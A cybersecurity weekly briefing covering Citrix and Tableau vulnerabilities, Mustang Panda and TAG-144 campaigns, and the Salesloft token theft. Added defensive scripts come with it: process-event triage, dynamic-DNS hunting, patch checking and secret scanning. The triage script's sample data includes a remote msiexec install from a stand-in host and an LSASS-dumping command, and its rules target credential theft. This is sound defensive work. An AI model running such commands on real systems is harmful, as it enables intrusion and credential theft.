Cyber Security Weekly Briefing, 23-29 August

August 29, 2025

Citrix fixes critical NetScaler RCE flaw exploited in zero-day attacks

Citrix has fixed three vulnerabilities in NetScaler ADC and NetScaler Gateway. The most serious is CVE-2025-7775 (CVSSv4 of 9.2 according to the manufacturer), a memory overflow flaw that allows unauthenticated remote code execution and was actively exploited as a zero-day.

The other two flaws correspond to CVE-2025-7776 (CVSSv4 of 8.8 according to Citrix), a memory overflow that generates a DoS condition, and CVE-2025-8424 (CVSSv4 of 8.7 according to Citrix), caused by improper access control in the management interface.

The flaws affect versions prior to 14.1-47.48, 13.1-59.22, 13.1-37.241-FIPS/NDcPP, and 12.1-55.330-FIPS/NDcPP, so Citrix recommends updating the firmware as soon as possible. Although the CVE-2025-7775 flaw has been observed in real attacks, no public exploits have been detected.

Mustang Panda: sophisticated cyber espionage tactics in 2025

Picus Security has exposed the tactics, techniques, and procedures of the Mustang Panda APT group, active since 2014 and linked to Chinese state cyber espionage. The group attacks government entities, NGOs, and religious organizations in the US, Europe, and Asia through spear-phishing campaigns with geopolitical lures and modular malware such as PlugX, Poison Ivy, and new families such as FDMTP.

In 2025, authorities dismantled more than 4,200 PlugX infections distributed via USB, demonstrating the actor's persistence. Mustang Panda employs tactics such as spear-phishing with LNK files, abuse of “msiexec.exe” for fileless execution, and DLL side-loading. For persistence, it uses registry keys, scheduled tasks, and malicious services.

Other notable techniques include process injection for defense evasion, credential theft by dumping LSASS, and discovery using WMI and built-in system commands. Collection includes screenshots, keylogging, and compression of the gathered data with WinRAR.
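The TTPs listed above (msiexec.exe pulling a remote package, shells launched from Explorer after an LNK lure, executables dropped under user-writable paths, persistence via scheduled tasks, services and Run keys, WMI discovery, and processes that reference LSASS) map directly onto process-creation telemetry. The following triage script is an added example, not part of the briefing or of Picus Security's report: it runs a small set of heuristic rules over constructed events shaped like Sysmon Event ID 1 fields. Every path, hostname and tool name in the sample data is invented, and the rules are starting points meant to be tuned against a real baseline, not a finished detection set.

```python
import re
from typing import Callable, Dict, List, Tuple

Event = Dict[str, str]

# Constructed process-creation events shaped like Sysmon Event ID 1 fields.
# Sample data written for this example; every path and name is invented.
SAMPLE_EVENTS: List[Event] = [
    {"id": "1", "image": r"C:\Windows\explorer.exe",
     "parent": r"C:\Windows\System32\userinit.exe", "cmdline": "explorer.exe"},
    {"id": "2", "image": r"C:\Windows\System32\cmd.exe", "parent": r"C:\Windows\explorer.exe",
     "cmdline": 'cmd.exe /c start "" msiexec.exe /q /i https://updates.example.invalid/pkg.msi'},
    {"id": "3", "image": r"C:\Windows\System32\msiexec.exe", "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": "msiexec.exe /q /i https://updates.example.invalid/pkg.msi"},
    {"id": "4", "image": r"C:\Users\alice\AppData\Roaming\Updater\viewer.exe",
     "parent": r"C:\Windows\System32\msiexec.exe", "cmdline": "viewer.exe"},
    {"id": "5", "image": r"C:\Windows\System32\schtasks.exe",
     "parent": r"C:\Users\alice\AppData\Roaming\Updater\viewer.exe",
     "cmdline": r'schtasks.exe /create /sc minute /mo 10 /tn Updater /tr "C:\Users\alice\AppData\Roaming\Updater\viewer.exe"'},
    {"id": "6", "image": r"C:\Windows\System32\wbem\WMIC.exe",
     "parent": r"C:\Users\alice\AppData\Roaming\Updater\viewer.exe", "cmdline": "wmic process list brief"},
    {"id": "7", "image": r"C:\Users\Public\dumptool.exe",
     "parent": r"C:\Users\alice\AppData\Roaming\Updater\viewer.exe", "cmdline": "dumptool.exe lsass.exe"},
    {"id": "8", "image": r"C:\Program Files\Vendor\app.exe", "parent": r"C:\Windows\explorer.exe",
     "cmdline": "app.exe"},
]

# Directory fragments a standard user can write to; binaries running from here
# are the usual hosts for side-loaded DLLs and dropped payloads.
USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\programdata\\", "\\users\\public\\")
SHELLS = ("cmd.exe", "powershell.exe", "mshta.exe", "wscript.exe", "cscript.exe")


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def rule_msiexec_remote(ev: Event) -> bool:
    # msiexec installing straight from a URL: the fileless execution the report describes.
    return basename(ev["image"]) == "msiexec.exe" and bool(re.search(r"https?://", ev["cmdline"], re.I))


def rule_explorer_spawned_shell(ev: Event) -> bool:
    # A double-clicked LNK shows up as Explorer launching a scripting host or shell.
    return basename(ev["parent"]) == "explorer.exe" and basename(ev["image"]) in SHELLS


def rule_user_writable_image(ev: Event) -> bool:
    return any(marker in ev["image"].lower() for marker in USER_WRITABLE)


def rule_persistence(ev: Event) -> bool:
    cl, img = ev["cmdline"].lower(), basename(ev["image"])
    return ((img == "schtasks.exe" and "/create" in cl)
            or (img == "sc.exe" and " create" in cl)
            or (img == "reg.exe" and "\\currentversion\\run" in cl))


def rule_wmi_discovery(ev: Event) -> bool:
    return basename(ev["image"]) == "wmic.exe"


def rule_lsass_reference(ev: Event) -> bool:
    # Any non-LSASS process naming lsass on its command line deserves a look.
    return "lsass" in ev["cmdline"].lower() and basename(ev["image"]) != "lsass.exe"


RULES: List[Tuple[str, Callable[[Event], bool]]] = [
    ("msiexec_remote_package", rule_msiexec_remote),
    ("explorer_spawned_shell", rule_explorer_spawned_shell),
    ("user_writable_image", rule_user_writable_image),
    ("persistence_mechanism", rule_persistence),
    ("wmi_discovery", rule_wmi_discovery),
    ("lsass_reference", rule_lsass_reference),
]


def triage(events: List[Event]) -> List[Tuple[str, str]]:
    """Return (event id, rule name) for every rule each event trips."""
    return [(ev["id"], name) for ev in events for name, pred in RULES if pred(ev)]


if __name__ == "__main__":
    for event_id, rule in triage(SAMPLE_EVENTS):
        print(f"event {event_id}: {rule}")
```

Read the hits as a chain rather than in isolation: Explorer spawning cmd.exe, which runs msiexec against a URL, which drops a binary under AppData that then registers a scheduled task and starts running discovery is far more convincing than any single rule firing, and correlating on the parent/child relationship is how to keep the broad rules (user-writable path, WMI use) from drowning analysts in benign hits.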

TAG-144 intensifies attacks against government entities in South America

TAG-144, also known as Blind Eagle or APT-C-36, has carried out five campaigns between May 2024 and July 2025, targeting government entities in Colombia and, to a lesser extent, Ecuador, Chile, and Panama. Active since 2018, it combines cyber espionage and financial fraud using remote access Trojans such as AsyncRAT, REMCOS RAT, DcRAT, LimeRAT, and XWorm.

According to Recorded Future, the campaigns use multi-stage infection chains and abuse legitimate services such as Discord, GitHub, and Archive.org, as well as steganography techniques. The infrastructure includes VPS, IPs from Colombian ISPs, dynamic domains on duckdns.org and noip.com, and VPNs to hide operations.

Some campaigns take advantage of free hosting, Telegram, and phishing pages that impersonate banks such as Bancolombia. Links to Red Akodon were also detected through shared repositories and compromised accounts.
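The dynamic DNS providers named above (duckdns.org and noip.com) are a cheap place to start hunting for TAG-144-style infrastructure in resolver logs. The script below is an added example, not from the briefing or from Recorded Future's report: it parses constructed DNS query lines in an assumed "timestamp client query TYPE name" format and flags hostnames that sit beneath one of those suffixes. The suffix list is taken from the page and is not exhaustive (No-IP, for instance, offers many other domains), so extend it from your own threat intelligence.

```python
import re
from collections import Counter
from typing import List, Tuple

# Dynamic DNS suffixes named in the briefing; extend from your own intel.
DYNAMIC_DNS_SUFFIXES = ("duckdns.org", "noip.com")

# Assumed log shape: "<timestamp> <client ip> query <qtype> <name>".
LOG_RE = re.compile(r"^(?P<ts>\S+)\s+(?P<client>\S+)\s+query\s+(?P<qtype>\S+)\s+(?P<name>\S+)$")

# Constructed sample resolver log (not real traffic); note the look-alike
# "notduckdns.org", the trailing-dot FQDN and the mixed-case name.
SAMPLE_DNS_LOG = """\
2025-07-01T10:00:01Z 10.0.0.5 query A updates.example.invalid
2025-07-01T10:00:02Z 10.0.0.5 query A srv-colombia.duckdns.org
2025-07-01T10:00:03Z 10.0.0.7 query A notduckdns.org
2025-07-01T10:00:04Z 10.0.0.7 query A login.noip.com.
2025-07-01T10:00:05Z 10.0.0.5 query AAAA host-4411.DuckDNS.org
this line is not a query record
"""


def is_dynamic_dns_host(name: str) -> bool:
    """True only for hostnames strictly below a listed suffix.

    Matching on a label boundary ("." + suffix) keeps look-alikes such as
    notduckdns.org out, and the bare apex (the provider's own site) is not
    flagged either, since the rented hostnames are always subdomains."""
    name = name.rstrip(".").lower()
    return any(name.endswith("." + suffix) for suffix in DYNAMIC_DNS_SUFFIXES)


def find_dynamic_dns_lookups(log_text: str) -> List[Tuple[str, str]]:
    """Return (client, normalised hostname) for every flagged query line."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line.strip())
        if m is None:
            continue  # not a query record; skip rather than crash on noise
        if is_dynamic_dns_host(m["name"]):
            hits.append((m["client"], m["name"].rstrip(".").lower()))
    return hits


def clients_by_count(hits: List[Tuple[str, str]]) -> Counter:
    """How many flagged lookups each client made, to prioritise follow-up."""
    return Counter(client for client, _ in hits)


if __name__ == "__main__":
    found = find_dynamic_dns_lookups(SAMPLE_DNS_LOG)
    for client, host in found:
        print(f"{client} -> {host}")
    print(clients_by_count(found))
```

A single lookup of a dynamic DNS host is weak evidence on its own; the per-client count plus the query types (here an AAAA for a rarely-used host) is what turns it into a lead worth pivoting on with the process and proxy logs for that machine.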

New bugs patched in Tableau Server and Desktop

Salesforce has fixed several critical vulnerabilities in Tableau Server and Desktop. The most serious is CVE-2025-26496 (CVSSv3 of 9.6 according to CISA), a type confusion flaw that allows local code inclusion and arbitrary execution in file upload modules.

Other flaws include CVE-2025-26497 and CVE-2025-26498 (CVSSv3 of 7.7 according to the manufacturer), which allow the upload of malicious files in the Flow Editor and establish-connection-no-undo modules, as well as CVE-2025-52450 and CVE-2025-52451 (CVSSv3 of 8.5 according to the manufacturer), which affect the tabdoc API through validation and path traversal flaws. The flaws affect Tableau Server versions prior to 2025.1.4, 2024.2.13, and 2023.3.20, and the corresponding versions of Tableau Desktop on Windows and Linux.
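Both the NetScaler advisory earlier in this briefing and the Tableau advisory above give their fixed versions per release branch, and the recurring mistake when triaging an estate is to compare builds as strings or across branches (a NetScaler 13.1-37.x FIPS build is not "behind" 13.1-59.22; it has its own fix line). The checker below is an added example, not tooling from Citrix, Salesforce or the briefing: it encodes the fixed builds quoted on this page, works out which branch a build belongs to, and compares numerically within that branch. The NetScaler banner shape it parses ("NetScaler NS14.1: Build 47.46.nc") is an assumption about `show version` output, so verify it against your appliances.

```python
import re
from typing import Optional, Tuple

# First fixed build per product branch, as stated in this briefing (NetScaler
# figures from Citrix, Tableau Server figures from Salesforce). Keys are
# (product, branch); the FIPS/NDcPP NetScaler builds are their own branches.
FIXED_BUILDS = {
    ("netscaler", "14.1"): "14.1-47.48",
    ("netscaler", "13.1"): "13.1-59.22",
    ("netscaler", "13.1-FIPS"): "13.1-37.241",
    ("netscaler", "12.1-FIPS"): "12.1-55.330",
    ("tableau", "2025.1"): "2025.1.4",
    ("tableau", "2024.2"): "2024.2.13",
    ("tableau", "2023.3"): "2023.3.20",
}

# Pulls "13.1" and "59.22" out of either "13.1-59.22" or an assumed banner
# such as "NetScaler NS13.1: Build 59.22.nc".
_NS_RE = re.compile(r"(\d+\.\d+)\D+?(\d+\.\d+)")


def _numeric(build: str) -> Tuple[int, ...]:
    """'13.1-59.22' -> (13, 1, 59, 22) so builds compare numerically, not as strings."""
    return tuple(int(part) for part in re.split(r"[.\-]", build))


def _branch_and_build(product: str, raw: str) -> Tuple[str, str]:
    if product == "netscaler":
        m = _NS_RE.search(raw)
        if m is None:
            raise ValueError(f"unrecognised NetScaler version: {raw!r}")
        build = f"{m.group(1)}-{m.group(2)}"
        # A FIPS/NDcPP marker anywhere in the string selects the hardened branch.
        fips = bool(re.search(r"FIPS|NDcPP", raw, re.I))
        branch = f"{m.group(1)}-FIPS" if fips else m.group(1)
        return branch, build
    if product == "tableau":
        build = raw.strip()
        branch = ".".join(build.split(".")[:2])  # "2024.2.12" -> "2024.2"
        return branch, build
    raise ValueError(f"unknown product: {product}")


def is_patched(product: str, raw: str) -> Optional[bool]:
    """True if the build is at or above the fixed build on its own branch,
    False if it is older, None if the branch is not in the table (an
    unlisted release line needs a separate check, not a silent pass)."""
    branch, build = _branch_and_build(product, raw)
    fixed = FIXED_BUILDS.get((product, branch))
    if fixed is None:
        return None
    return _numeric(build) >= _numeric(fixed)


if __name__ == "__main__":
    for product, raw in [
        ("netscaler", "NetScaler NS14.1: Build 47.46.nc"),
        ("netscaler", "13.1-37.241 FIPS"),
        ("netscaler", "13.1-37.241"),
        ("tableau", "2024.2.12"),
    ]:
        print(product, raw, "->", is_patched(product, raw))
```

The `None` result is deliberate: an inventory script that treats "branch not in my table" as "patched" will hide exactly the appliances on end-of-life lines that most need attention.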

Attackers compromise Salesloft to steal OAuth tokens and access Salesforce

Salesloft confirmed a breach in its SalesDrift integration with Salesforce, where attackers stole OAuth and refresh tokens between August 8 and 18, 2025. With these credentials, the actors accessed Salesforce instances and ran SOQL queries to extract sensitive data, including AWS keys, passwords, and tokens related to Snowflake.

According to Google Threat Intelligence, the UNC6395 group is behind the campaign, employing hidden infrastructure on Tor, AWS, and DigitalOcean, and custom tools such as Salesforce-Multi-Org-Fetcher. Although ShinyHunters initially claimed responsibility for the attack, there is no evidence linking it to them. Salesloft and Salesforce revoked all active tokens, requesting customers to reconnect the integration.

It is recommended to rotate credentials, review logs, and search for possible exposed secrets, such as AKIA keys, Snowflake credentials, and VPN or SSO access URLs.
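The "search for exposed secrets" step means going through whatever the stolen tokens could have read (support cases, notes, attachments) for the same kinds of material the attackers were after. The scanner below is an added example and not tooling from Salesloft, Salesforce or Google Threat Intelligence: it runs a few patterns over a constructed CSV export standing in for SOQL query results. The AWS access key ID format (AKIA followed by 16 characters) and the snowflakecomputing.com account hostname are real formats; the password-assignment and VPN/SSO URL patterns are deliberately broad and will need tuning. The key in the sample is the one AWS uses in its own documentation and is not a live credential; every other value is invented.

```python
import csv
import io
import re
from collections import Counter
from typing import Dict, List

# Patterns for the secret types named in the briefing. Patterns with a capture
# group report only the group (the credential itself), others the whole match.
PATTERNS = [
    ("aws_access_key_id", re.compile(r"\bAKIA[0-9A-Z]{16}\b")),
    ("snowflake_account_host", re.compile(r"\b[a-z0-9][a-z0-9.\-]*\.snowflakecomputing\.com\b", re.I)),
    ("password_assignment", re.compile(r"\b(?:password|passwd|pwd)\s*[:=]\s*[\"']?([^\s\"',;]+)", re.I)),
    ("vpn_or_sso_url", re.compile(r"https?://\S*(?:vpn|sso)\S*", re.I)),
]

# Constructed export of support-case records (stand-in for SOQL output).
# AKIAIOSFODNN7EXAMPLE is AWS's documentation example key, not a real one.
SAMPLE_EXPORT = """\
Id,Subject,Description
500xx1,VPN help,"Connect at https://vpn.example.invalid/login with user bob"
500xx2,Data pipeline,"Snowflake acct ab12345.eu-central-1.snowflakecomputing.com password=Winter2025!"
500xx3,Cloud access,"aws key AKIAIOSFODNN7EXAMPLE secret not included"
500xx4,General,"No secrets here, just a normal ticket"
"""


def redact(value: str) -> str:
    """Keep enough of a value to recognise it in a ticket without re-exposing it."""
    if len(value) <= 8:
        return "*" * len(value)
    return value[:4] + "*" * (len(value) - 6) + value[-2:]


def scan_export(csv_text: str) -> List[Dict[str, str]]:
    """Return one finding per pattern match, with the matched value redacted."""
    findings: List[Dict[str, str]] = []
    for row in csv.DictReader(io.StringIO(csv_text)):
        for field, text in row.items():
            if not text:
                continue
            for kind, pattern in PATTERNS:
                for m in pattern.finditer(text):
                    value = m.group(1) if m.lastindex else m.group(0)
                    findings.append({
                        "record": row["Id"],
                        "field": field,
                        "kind": kind,
                        "redacted": redact(value),
                    })
    return findings


def count_by_kind(findings: List[Dict[str, str]]) -> Counter:
    return Counter(f["kind"] for f in findings)


if __name__ == "__main__":
    results = scan_export(SAMPLE_EXPORT)
    for f in results:
        print(f"{f['record']}.{f['field']}: {f['kind']} -> {f['redacted']}")
    print(count_by_kind(results))
```

Treat every hit as a rotation task, not just a report line: a key that sat in a case description readable through the compromised integration has to be assumed copied, regardless of whether the export logs show that particular record being queried.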